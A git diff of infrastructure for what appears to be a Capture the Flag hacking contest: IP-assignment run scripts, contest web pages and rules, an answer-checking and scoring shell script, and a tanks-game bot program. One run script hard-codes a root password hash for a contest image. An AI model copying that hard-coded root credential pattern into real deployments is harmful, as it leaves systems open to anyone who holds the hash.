exec tcpsvd -u ctf ${IP%/*} 80 /opt/mcp/bin/eris -c
|
||||
|
|
|
@ -0,0 +1,5 @@
|
|||
#! /bin/sh
|
||||
|
||||
while sleep 5; do
|
||||
echo -n . 1>&2
|
||||
done
|
|
@ -0,0 +1,3 @@
|
|||
#! /bin/sh
|
||||
|
||||
exec ./logclean
|
|
@ -18,14 +18,16 @@
|
|||
<ul>
|
||||
<li>Alex Brugh</li>
|
||||
<li>Paul Ferrell</li>
|
||||
<li>Danny Quist</li>
|
||||
<li>Jeremy Scott</li>
|
||||
<li>Danny Quist</li>
|
||||
<li>Adam Glasgall</li>
|
||||
<li>Curtis Hash</li>
|
||||
<li>Patrick Avery</li>
|
||||
<li>Aaron McPhall</li>
|
||||
<li>Patrick Avery</li>
|
||||
<li>Erin Ochoa</li>
|
||||
<li>William Phillips</li>
|
||||
<li>Should your name be here? Please remind me!</li>
|
||||
</ul>
|
||||
|
||||
<p>Parts of this contest were inspired by:</p>
|
||||
|
|
|
@ -46,7 +46,7 @@ h1:first-child {
|
|||
|
||||
h1:first-child:before {
|
||||
letter-spacing: -0.1em;
|
||||
content: "Tracer FIRE: ";
|
||||
content: "FIRE: ";
|
||||
}
|
||||
|
||||
/**** body ****/
|
||||
|
|
|
@ -15,12 +15,16 @@
|
|||
<li>
|
||||
<a href="puzzles.html">Puzzles</a>
|
||||
</li>
|
||||
<li>
|
||||
<a href="news.html">News</a>
|
||||
</li>
|
||||
<li>
|
||||
<a href="scoring.html">About scoring</a>
|
||||
</li>
|
||||
<li>
|
||||
<a href="irc://[fd84:b410:3441::6]/ctf"
|
||||
title="IRC on fd84:b410:3441::6, channel #ctf">Contest chat</a>
|
||||
(<a href="irc://10.0.0.6/ctf" title="IRC on 10.0.0.6, channel #ctf">IPv4</a>)
|
||||
carries important announcements, and sometimes clues and
|
||||
puzzles.
|
||||
</li>
|
||||
|
@ -43,11 +47,13 @@
|
|||
<h2>Rules</h2>
|
||||
<ul>
|
||||
<li>
|
||||
No DoS attacks.
|
||||
No DoS attacks. No link layer (ARP, NDP) attacks.
|
||||
</li>
|
||||
<li>
|
||||
Contest servers lie within <samp>fd84:b410:3441::/112</samp>.
|
||||
Do not attack machines outside <samp>fd84:b410:3441::/48</samp>.
|
||||
Contest servers lie within <samp>fd84:b410:3441::/112</samp>
|
||||
(or <samp>10.0.0.0/24</samp> for IPv4 contests).
|
||||
Do not attack machines outside <samp>fd84:b410:3441::/48</samp>
|
||||
(<samp>10.0.0.0/16</samp>).
|
||||
Low ports (under 1024) do not run contest categories, don't
|
||||
waste your time.
|
||||
</li>
|
||||
|
|
|
@ -0,0 +1,18 @@
|
|||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<title>News</title>
|
||||
<link rel="stylesheet" href="ctf.css" type="text/css">
|
||||
</head>
|
||||
<body>
|
||||
<h1>News</h1>
|
||||
|
||||
<ul>
|
||||
<li>Contest is open</li>
|
||||
</ul>
|
||||
|
||||
<p>
|
||||
This page will be updated with any new announcements.
|
||||
</p>
|
||||
</body>
|
||||
</html>
|
|
@ -0,0 +1,3 @@
|
|||
#! /bin/sh
|
||||
|
||||
/opt/00admin/sbin/fire-ip del
|
|
@ -1 +1 @@
|
|||
fd84:b410:3441::4e11/64
|
||||
17
|
||||
|
|
|
@ -2,7 +2,6 @@
|
|||
|
||||
exec 2>&1
|
||||
|
||||
IP=$(cat ip.txt)
|
||||
ip addr add $IP dev eth0 || true
|
||||
IP=$(/opt/00admin/sbin/fire-ip add)
|
||||
|
||||
exec setuidgid ctf /opt/multicaster/bin/multicaster ff15::62c 1580 </opt/multicaster/tokens.txt
|
||||
|
|
|
@ -0,0 +1 @@
|
|||
8
|
|
@ -0,0 +1,3 @@
|
|||
#! /bin/sh
|
||||
|
||||
exec svlogd -tt $PWD
|
|
@ -1,5 +1,8 @@
|
|||
#! /bin/sh -e
|
||||
|
||||
IP=$(cat ../octopus/ip.txt)
|
||||
exec 2>&1
|
||||
|
||||
IP=$(/opt/00admin/sbin/fire-ip)
|
||||
|
||||
sv s octopus >/dev/null || exit 1
|
||||
exec tcpsvd ${IP%/*} 8888 ./octopus-redirect
|
||||
|
|
|
@ -0,0 +1,3 @@
|
|||
#! /bin/sh
|
||||
|
||||
/opt/00admin/sbin/fire-ip del
|
|
@ -1 +1 @@
|
|||
fd84:b410:3441::8888/64
|
||||
8
|
||||
|
|
|
@ -2,7 +2,8 @@
|
|||
|
||||
exec 2>&1
|
||||
|
||||
IP=$(cat ip.txt)
|
||||
ip addr add $IP dev eth0 || true
|
||||
IP=$(/opt/00admin/sbin/fire-ip add)
|
||||
|
||||
grep -q ipv4 /proc/cmdline && IP=::ffff:$IP
|
||||
|
||||
exec /opt/octopus/bin/octopus ${IP%/*} < /opt/octopus/tokens.txt
|
||||
|
|
|
@ -0,0 +1,88 @@
|
|||
#! /bin/sh
|
||||
|
||||
BASE=/tmp/p2
|
||||
|
||||
mkdir -p $BASE
|
||||
|
||||
if ! [ -f $BASE/nonce ]; then
|
||||
dd if=/dev/urandom count=1 | md5sum - > $BASE/nonce
|
||||
fi
|
||||
clear
|
||||
read nonce < $BASE/nonce
|
||||
|
||||
esc () {
|
||||
printf '%s' "$*" | sed 's/[^-0-9A-Za-z ]/_/g; s/ /+/g'
|
||||
}
|
||||
|
||||
newteam () {
|
||||
echo '== Team Creation =='
|
||||
echo
|
||||
echo -n 'What would you like your team to be called (3-12 chars)? '
|
||||
read -r name
|
||||
echo
|
||||
namelen=$(printf "%s" "$name" | wc -c)
|
||||
if [ $namelen -lt 3 ] || [ $namelen -gt 12 ]; then
|
||||
echo 'Invalid name length'
|
||||
return
|
||||
fi
|
||||
hash=$(printf '%s %s' "$nonce" "$name" | md5sum | cut -b 1-8)
|
||||
|
||||
if [ -d $BASE/$hash ]; then
|
||||
echo "That name is already in use. Try another one."
|
||||
return
|
||||
fi
|
||||
|
||||
mkdir $BASE/$hash
|
||||
|
||||
printf '%s' "$name" > $BASE/$hash/.name
|
||||
|
||||
cat <<EOD
|
||||
Your team hash is $hash. Write that down somewhere and don't lose it.
|
||||
If you forget your hash, you'll have to start over from the beginning
|
||||
with a new team and everybody will laugh at you.
|
||||
EOD
|
||||
}
|
||||
|
||||
done () {
|
||||
echo
|
||||
echo "Press [Enter] to clear the screen."
|
||||
read
|
||||
exit 0
|
||||
}
|
||||
|
||||
echo -n 'Team hash ("new" to create a new team): '
|
||||
read -r hash
|
||||
echo
|
||||
if [ -z "$hash" ]; then
|
||||
exit 0
|
||||
elif [ "$hash" = "new" ]; then
|
||||
newteam
|
||||
done
|
||||
elif ! [ -d $BASE/$hash ]; then
|
||||
echo "No such team, fool."
|
||||
echo "Is this when everybody laughs at you for forgetting your hash?"
|
||||
done
|
||||
fi
|
||||
|
||||
read -r name < $BASE/$hash/.name
|
||||
echo "Welcome $name"
|
||||
echo
|
||||
echo "Enter answer and I'll tell you if it's right or if you're a dummy."
|
||||
echo -n '> '
|
||||
read -r answer
|
||||
match=$(awk -v ans="$answer" '(substr($0, length($1)+2) == ans) { print substr(FILENAME, 6, length(FILENAME)-17) " " $1; }' /opt/*/answers.txt)
|
||||
cat=${match% *}
|
||||
points=${match#* }
|
||||
fn=$BASE/$hash/$cat.$points
|
||||
if [ -f $fn ]; then
|
||||
echo "You've already received points for this answer."
|
||||
else
|
||||
printf "%s %s\n" $cat $points > $fn
|
||||
echo "You get $points more points in the $cat category."
|
||||
# run puzzles.cgi
|
||||
# update scoreboard
|
||||
echo "Check the puzzles overview for newly-unlocked content!"
|
||||
fi
|
||||
|
||||
done
|
||||
|
|
@ -0,0 +1,51 @@
|
|||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<title>The Credits</title>
|
||||
<link rel="stylesheet" href="ctf.css" type="text/css">
|
||||
</head>
|
||||
<body>
|
||||
<h1>Credits</h1>
|
||||
|
||||
<p>Dirtbags Capture the Flag is brought to you by:</p>
|
||||
|
||||
<ul>
|
||||
<li>The number C</li>
|
||||
<li>The letters ع and ֆ</li>
|
||||
</ul>
|
||||
|
||||
<p>And by:</p>
|
||||
<ul>
|
||||
<li>Alex Brugh</li>
|
||||
<li>Paul Ferrell</li>
|
||||
<li>Jeremy Scott</li>
|
||||
<li>Danny Quist</li>
|
||||
<li>Adam Glasgall</li>
|
||||
<li>Curtis Hash</li>
|
||||
<li>Aaron McPhall</li>
|
||||
<li>Patrick Avery</li>
|
||||
<li>Erin Ochoa</li>
|
||||
<li>William Phillips</li>
|
||||
<li>Should your name be here? Please remind me!</li>
|
||||
</ul>
|
||||
|
||||
<p>Parts of this contest were inspired by:</p>
|
||||
<ul>
|
||||
<li>DC949</li>
|
||||
<li>Tube Warriors</li>
|
||||
<li>Bad people from around the world (screw you guys, seriously)</li>
|
||||
</ul>
|
||||
|
||||
<p>Lastly, this contest would not exist were it not for hundreds of
|
||||
thousands of lines of code from free software authors around the
|
||||
world, including:</p>
|
||||
<ul>
|
||||
<li>Busybox and Buildroot</li>
|
||||
<li>the Linux kernel</li>
|
||||
<li>dnsmasq</li>
|
||||
<li>fnord httpd</li>
|
||||
<li>ngircd</li>
|
||||
<li>lua</li>
|
||||
</ul>
|
||||
</body>
|
||||
</html>
|
|
@ -0,0 +1,174 @@
|
|||
/* green phosphor: #2a4 */
|
||||
|
||||
/**** Color Scheme ****/
|
||||
html {
|
||||
background: #112 url(smoke.jpg) no-repeat;
|
||||
background-size: contain;
|
||||
}
|
||||
|
||||
body, h1:first-child:before {
|
||||
color: #ddc;
|
||||
}
|
||||
|
||||
h1, h2, h3 {
|
||||
color: #1dd;
|
||||
}
|
||||
|
||||
a {
|
||||
color: #f80;
|
||||
}
|
||||
|
||||
a:hover {
|
||||
color: #112;
|
||||
background-color: #f80;
|
||||
}
|
||||
|
||||
.readme, pre {
|
||||
background-color: #333;
|
||||
}
|
||||
|
||||
/**** document ****/
|
||||
|
||||
body {
|
||||
font-family: sans-serif;
|
||||
padding: 10px;
|
||||
max-width: 700px;
|
||||
}
|
||||
|
||||
/**** heading ****/
|
||||
|
||||
h1:first-child {
|
||||
text-transform: lowercase;
|
||||
font-size: 1.6em;
|
||||
padding: 3px;
|
||||
margin: 0 0 1em 70px;
|
||||
}
|
||||
|
||||
h1:first-child:before {
|
||||
letter-spacing: -0.1em;
|
||||
content: "P2: ";
|
||||
}
|
||||
|
||||
/**** body ****/
|
||||
|
||||
a img {
|
||||
border: 0px;
|
||||
}
|
||||
|
||||
a {
|
||||
text-decoration: underline;
|
||||
}
|
||||
|
||||
h1, h2, h3 {
|
||||
letter-spacing: -0.05em;
|
||||
}
|
||||
|
||||
.readme {
|
||||
margin: 1em;
|
||||
}
|
||||
|
||||
pre {
|
||||
border: solid #ddc 2px;
|
||||
padding: 0.25em;
|
||||
}
|
||||
|
||||
|
||||
th {
|
||||
vertical-align: top;
|
||||
text-align: center;
|
||||
}
|
||||
td {
|
||||
vertical-align: top;
|
||||
text-align: left;
|
||||
}
|
||||
|
||||
dt {
|
||||
font-weight: bold;
|
||||
}
|
||||
|
||||
p {
|
||||
line-height: 1.4em;
|
||||
margin-bottom: 20px;
|
||||
}
|
||||
|
||||
hr {
|
||||
border: 1px solid #ddc;
|
||||
}
|
||||
|
||||
|
||||
|
||||
/*** navigation bar ***/
|
||||
|
||||
nav h2 {
|
||||
display: none;
|
||||
}
|
||||
|
||||
nav ul {
|
||||
list-style: none;
|
||||
text-align: center;
|
||||
}
|
||||
|
||||
nav li {
|
||||
display: inline;
|
||||
}
|
||||
|
||||
nav li a {
|
||||
text-transform: lowercase;
|
||||
font-size: 0.9em;
|
||||
}
|
||||
|
||||
nav li + li:before {
|
||||
content: " | ";
|
||||
}
|
||||
|
||||
/**** special cases ****/
|
||||
|
||||
.wide {
|
||||
max-width: inherit;
|
||||
}
|
||||
|
||||
.figure {
|
||||
margin: 0.5em 1em;
|
||||
float: right;
|
||||
font-size: small;
|
||||
text-align: center;
|
||||
}
|
||||
|
||||
/* P2 stuff */
|
||||
#puzzler {
|
||||
/* The puzzler form is not used in Project 2 */
|
||||
display: none;
|
||||
}
|
||||
|
||||
/* Scoreboard stuff */
|
||||
|
||||
.scoreboard, .scoreboard body {
|
||||
height: 100%;
|
||||
margin: 0;
|
||||
padding: 0;
|
||||
max-width: none;
|
||||
}
|
||||
|
||||
#scoreboard {
|
||||
height: 60%;
|
||||
font-size: 75%;
|
||||
}
|
||||
|
||||
#scoreboard td {
|
||||
height: 100%;
|
||||
}
|
||||
|
||||
#chart {
|
||||
height: 30%;
|
||||
width: 100%;
|
||||
}
|
||||
|
||||
/* Tanks stuff */
|
||||
|
||||
#battlefield {
|
||||
border: 2px solid green;
|
||||
}
|
||||
|
||||
.solved {
|
||||
text-decoration: line-through;
|
||||
}
|
|
@ -0,0 +1,31 @@
|
|||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<title>Welcome</title>
|
||||
<link rel="stylesheet" href="ctf.css" type="text/css">
|
||||
</head>
|
||||
<body>
|
||||
<h1>Welcome</h1>
|
||||
|
||||
<h2>Important Links</h2>
|
||||
<ul>
|
||||
<li>
|
||||
<a href="scoreboard.html">Scoreboard</a>
|
||||
</li>
|
||||
<li>
|
||||
<a href="puzzles.html">Puzzles</a>
|
||||
</li>
|
||||
<li>
|
||||
<a href="news.html">News</a>
|
||||
</li>
|
||||
<li>
|
||||
<a href="scoring.html">About scoring</a>
|
||||
</li>
|
||||
</ul>
|
||||
|
||||
<p>
|
||||
This event would not be possible without the help of many people.
|
||||
<a href="credits.html">Thank you, people</a>.
|
||||
</p>
|
||||
</body>
|
||||
</html>
|
|
@ -0,0 +1,46 @@
|
|||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<title>About scoring</title>
|
||||
<link rel="stylesheet" href="ctf.css" type="text/css">
|
||||
<meta charset="utf-8">
|
||||
</head>
|
||||
<body>
|
||||
<h1>About scoring</h1>
|
||||
<p>
|
||||
The contest is made up of multiple categories. Each category is
|
||||
worth one point toward the total score; the percentage of the
|
||||
total points held by your team is the percentage of one point your
|
||||
team has for that category.
|
||||
</p>
|
||||
|
||||
<p>
|
||||
Categories are in the form of
|
||||
multiple <em>puzzles</em>: for each puzzle presented, a
|
||||
case-sensitive answer must be found to receive the amount of
|
||||
points that puzzle is worth. Any team may answer any puzzle
|
||||
question at any time. A new puzzle is revealed when a team
|
||||
correctly answers the highest-valued puzzle in that category.
|
||||
</p>
|
||||
|
||||
|
||||
<h2>About time</h2>
|
||||
<p>
|
||||
Many Capture The Flag contests attempt to reward teams who answer
|
||||
quickly, by adding a "quick answer" bonus or by decaying point
|
||||
values over time. Our contest doesn't work this way.
|
||||
</p>
|
||||
<p>
|
||||
We want to focus on rewarding technical proficiency, allowing
|
||||
skilled contestants to prove their worth independent of their
|
||||
ability to hit F5 quickly. It is our hope that by providing
|
||||
enough things to work on, quick-moving teams will emerge with more
|
||||
points by solving lots of puzzles, while novice teams get a solid
|
||||
benchmark against which to judge their technical skill level: you
|
||||
don't have to make allowances for reaction time in comparing
|
||||
scores. In addition, when the game infrastructure goes down—which
|
||||
seems to happen a lot in anybody's CTF—there's no losing points
|
||||
while the organizers struggle to get things back up.
|
||||
</p>
|
||||
</body>
|
||||
</html>
|
|
@ -0,0 +1,3 @@
|
|||
#! /bin/sh
|
||||
|
||||
/opt/00admin/sbin/fire-ip del
|
|
@ -1 +1 @@
|
|||
fd84:b410:3441::529/64
|
||||
41
|
||||
|
|
|
@ -2,7 +2,7 @@
|
|||
|
||||
exec 2>&1
|
||||
|
||||
IP=$(cat ip.txt)
|
||||
IP=$(/opt/00admin/sbin/fire-ip add)
|
||||
ip addr add $IP dev eth0 || true
|
||||
|
||||
exec tcpsvd -u nobody ${IP%/*} 1013 /opt/playfair/bin/playfair
|
||||
|
|
|
@ -1,4 +1,3 @@
|
|||
#! /bin/sh
|
||||
|
||||
IP=$(cat ip.txt)
|
||||
ip addr del $IP dev eth0
|
||||
/opt/00admin/sbin/fire-ip del
|
||||
|
|
|
@ -1 +1 @@
|
|||
fd84:b410:3441::2329/64
|
||||
152
|
||||
|
|
|
@ -2,9 +2,7 @@
|
|||
|
||||
exec 2>&1
|
||||
|
||||
IP=$(cat ip.txt)
|
||||
ip addr add $IP dev eth0
|
||||
ip monitor | grep -q $IP
|
||||
IP=$(/opt/00admin/sbin/fire-ip add)
|
||||
|
||||
# So I say to him, "Alex, what's a good high port number for a CTF category?"
|
||||
# And he says, "6"
|
||||
|
|
|
@ -0,0 +1,3 @@
|
|||
#! /bin/sh
|
||||
|
||||
/opt/00admin/sbin/fire-ip del
|
|
@ -1 +1 @@
|
|||
fd84:b410:3441::c3/64
|
||||
195
|
||||
|
|
|
@ -2,8 +2,7 @@
|
|||
|
||||
exec 2>&1
|
||||
|
||||
IP=$(cat ip.txt)
|
||||
ip addr add $IP dev eth0 || true
|
||||
IP=$(/opt/00admin/sbin/fire-ip add)
|
||||
|
||||
exec tcpsvd -u nobody ${IP%/*} 1013 ./go
|
||||
|
||||
|
|
|
@ -1,4 +1,3 @@
|
|||
#! /bin/sh
|
||||
|
||||
read IP < ip.txt
|
||||
ip addr del $IP dev eth0
|
||||
/opt/00admin/sbin/fire-ip del
|
||||
|
|
|
@ -1 +1 @@
|
|||
fd84:b410:3441::b33b/64
|
||||
59
|
||||
|
|
|
@ -1,8 +1,8 @@
|
|||
#! /bin/sh -e
|
||||
|
||||
exec 2>&1
|
||||
read IP < ip.txt
|
||||
ip addr add $IP label eth0:rlyeh dev eth0 || true
|
||||
|
||||
IP=$(/opt/00admin/sbin/fire-ip add)
|
||||
|
||||
dir=/var/lib/ctf/rlyeh
|
||||
install -o nobody -d $dir
|
||||
|
|
|
@ -59,7 +59,7 @@ $(ECMH_BUILDDIR): $(ECMH_CACHE)
|
|||
|
||||
router-build: $(ROUTER_BUILDDIR)/ecmh-build
|
||||
$(ROUTER_BUILDDIR)/ecmh-build: $(ECMH_BUILDDIR)
|
||||
$(MAKE) -C $(ECMH_BUILDDIR)/src ECMH_VERSION=dbtl-git
|
||||
$(MAKE) -C $(ECMH_BUILDDIR)/src ECMH_VERSION=dbtl-git STRIP=$(STRIP)
|
||||
$(MAKE) -C $(ECMH_BUILDDIR)/tools/mtrace6
|
||||
touch $@
|
||||
|
||||
|
|
|
@ -2,6 +2,6 @@
|
|||
|
||||
exec 2>&1
|
||||
|
||||
echo 'root:$1$xAJ7KwiU$BeKJjYGs9r/hY9Ag4qv4I1:0:0:root:/tmp:/bin/sh' > /etc/passwd
|
||||
echo 'root:$1$xAJ7KwiU$BeKJjYGs9r/hY9Ag4qv4I1:0:0' | chpasswd --encrypted
|
||||
|
||||
exec dropbear -r ./rsa.key -E -F
|
||||
|
|
|
@ -0,0 +1 @@
|
|||
Neale Pickett <neale@lanl.gov>
|
|
@ -0,0 +1 @@
|
|||
#d0d054
|
|
@ -0,0 +1 @@
|
|||
skirts
|
|
@ -0,0 +1,58 @@
|
|||
15 14 set-speed!
|
||||
|
||||
( Front )
|
||||
5 sensor? {
|
||||
get-turret 45 + 90 < { 15 15 } { 2 2 } ifelse set-speed!
|
||||
0 set-turret!
|
||||
} if
|
||||
|
||||
( Rear )
|
||||
6 sensor? {
|
||||
get-turret 45 + 90 < { 2 2 } { -15 -15 } ifelse set-speed!
|
||||
180 set-turret!
|
||||
} if
|
||||
7 sensor? {
|
||||
90 set-turret!
|
||||
5 -5 set-speed!
|
||||
} if
|
||||
8 sensor? {
|
||||
-90 set-turret!
|
||||
-5 5 set-speed!
|
||||
} if
|
||||
|
||||
1 sensor? {
|
||||
get-turret 10 + set-turret!
|
||||
} if
|
||||
|
||||
2 sensor? {
|
||||
get-turret 10 - set-turret!
|
||||
} if
|
||||
|
||||
3 sensor? {
|
||||
get-turret 20 + set-turret!
|
||||
} if
|
||||
|
||||
4 sensor? {
|
||||
get-turret 20 - set-turret!
|
||||
} if
|
||||
|
||||
0 sensor? {
|
||||
0 0 set-speed!
|
||||
get-turret set-turret!
|
||||
fire!
|
||||
} if
|
||||
|
||||
fire-ready? ! {
|
||||
70 60 10 random +
|
||||
get-turret 90 + 180 > { exch } if
|
||||
set-speed!
|
||||
} if
|
||||
|
||||
9 sensor? {
|
||||
5 sensor? {
|
||||
-100 -100
|
||||
} {
|
||||
100 100
|
||||
} ifelse
|
||||
set-speed!
|
||||
} if
|
|
@ -0,0 +1 @@
|
|||
50 0 7 1
|
|
@ -0,0 +1 @@
|
|||
60 10 12 1
|
|
@ -0,0 +1 @@
|
|||
60 -10 12 1
|
|
@ -0,0 +1 @@
|
|||
90 30 40 1
|
|
@ -0,0 +1 @@
|
|||
90 -30 40 1
|
|
@ -0,0 +1 @@
|
|||
60 0 90 0
|
|
@ -0,0 +1 @@
|
|||
60 180 90 0
|
|
@ -0,0 +1 @@
|
|||
80 90 90 0
|
|
@ -0,0 +1 @@
|
|||
80 270 90 0
|
|
@ -0,0 +1 @@
|
|||
30 180 345 0
|
|
@ -1,12 +1,14 @@
|
|||
#! /bin/sh
|
||||
#! /bin/sh -e
|
||||
|
||||
exec 2>&1
|
||||
|
||||
mkdir -p /var/www/tanks
|
||||
ln -s /opt/tanks/html/* /var/www/tanks/
|
||||
ln -sf summary.html /var/www/tanks/index.html
|
||||
ln -s /opt/tanks/html/* /var/www/tanks/ || true
|
||||
ln -s summary.html /var/www/tanks/index.html || true
|
||||
|
||||
install -o ctf -d /var/lib/ctf/tanks/players
|
||||
mkdir -p /var/lib/ctf/tanks/players
|
||||
chown ctf /var/lib/ctf/tanks
|
||||
chown ctf /var/lib/ctf/tanks/players
|
||||
|
||||
PATH=/bin:/opt/ctfbase/bin:/opt/tanks/bin; export PATH
|
||||
exec ./tanksd
|
||||
|
|
|
@ -41,7 +41,7 @@ EOF
|
|||
}
|
||||
|
||||
while true; do
|
||||
for dn in /var/lib/ctf/teams/names/*; do
|
||||
find /var/lib/ctf/teams/names -type f | while read dn; do
|
||||
hash=${dn##*/}
|
||||
install -o ctf -d $p/$hash
|
||||
done
|
||||
|
@ -92,24 +92,19 @@ window.onload = go;
|
|||
<div id="game_box"><canvas id="battlefield"></canvas></div>
|
||||
<p><span id="fps">0</span> fps</p>
|
||||
EOF
|
||||
/opt/tanks/bin/rank.awk $rfn >>$fn
|
||||
awk -f /opt/tanks/bin/rank.awk $rfn >>$fn
|
||||
cat /opt/tanks/html/nav.html.inc >>$fn
|
||||
cat <<EOF >>$fn
|
||||
</body>
|
||||
</html>
|
||||
EOF
|
||||
|
||||
winner.awk $rfn | while read winner; do
|
||||
awk -f /opt/tanks/bin/winner.awk $rfn | while read winner; do
|
||||
hash=$(basename $winner)
|
||||
echo "Round $next winner: $hash" >> $log
|
||||
nwinners=$(wc -l $log)
|
||||
|
||||
# Read a token
|
||||
k=$(sed -n ${nwinners}p /opt/tanks/tokens.txt)
|
||||
|
||||
# XXX: pull this out into another daemon
|
||||
# XXX: this puts the token in /proc/self/cmdline
|
||||
wget -q -s "http://10.0.0.2/claim.cgi?t=$hash&k=$k"
|
||||
/opt/mcp/bin/pointscli $hash tanks 1
|
||||
done
|
||||
|
||||
ln -sf $fn $w/current.html
|
||||
|
|
|
@ -21,8 +21,6 @@ tanks-install: tanks-build
|
|||
cp $(TANKS_BUILDDIR)/rank.awk $(TANKS_PKGDIR)/bin
|
||||
cp $(TANKS_BUILDDIR)/winner.awk $(TANKS_PKGDIR)/bin
|
||||
|
||||
cp packages/tanks/tokens.txt $(TANKS_PKGDIR)/
|
||||
|
||||
$(call COPYTREE, packages/tanks/html, $(TANKS_PKGDIR)/html)
|
||||
cp packages/mcp/www/ctf.css $(TANKS_PKGDIR)/html/style.css
|
||||
cp $(TANKS_BUILDDIR)/nav.html.inc $(TANKS_PKGDIR)/html
|
||||
|
|
File diff suppressed because it is too large
Load Diff
|
@ -1,6 +1,4 @@
|
|||
#! /usr/bin/lua
|
||||
|
||||
require("lfs")
|
||||
#! /bin/env lua
|
||||
|
||||
BASEDIR = "/var/tmp/wopr"
|
||||
POST_MAX = 512
|
||||
|
@ -128,7 +126,7 @@ end
|
|||
--
|
||||
|
||||
function get(key, ...)
|
||||
local fn = string.format("%s/%s", dirname, key)
|
||||
local fn = string.format("%s.%s", dirname, key)
|
||||
local f = io.open(fn)
|
||||
if (not f) then
|
||||
return arg[1]
|
||||
|
@ -140,12 +138,9 @@ function get(key, ...)
|
|||
end
|
||||
|
||||
function set(key, ...)
|
||||
local fn = string.format("%s/%s", dirname, key)
|
||||
local fn = string.format("%s.%s", dirname, key)
|
||||
local f
|
||||
|
||||
-- Lazy mkdir to save a few inodes
|
||||
lfs.mkdir(dirname)
|
||||
|
||||
f = io.open(fn, "w")
|
||||
if not f then
|
||||
error("Unable to write " .. fn)
|
||||
|
@ -155,7 +150,7 @@ function set(key, ...)
|
|||
end
|
||||
|
||||
function del(key)
|
||||
local fn = string.format("%s/%s", dirname, key)
|
||||
local fn = string.format("%s.%s", dirname, key)
|
||||
os.remove(fn)
|
||||
end
|
||||
|
||||
|
|
Loading…
Reference in New Issue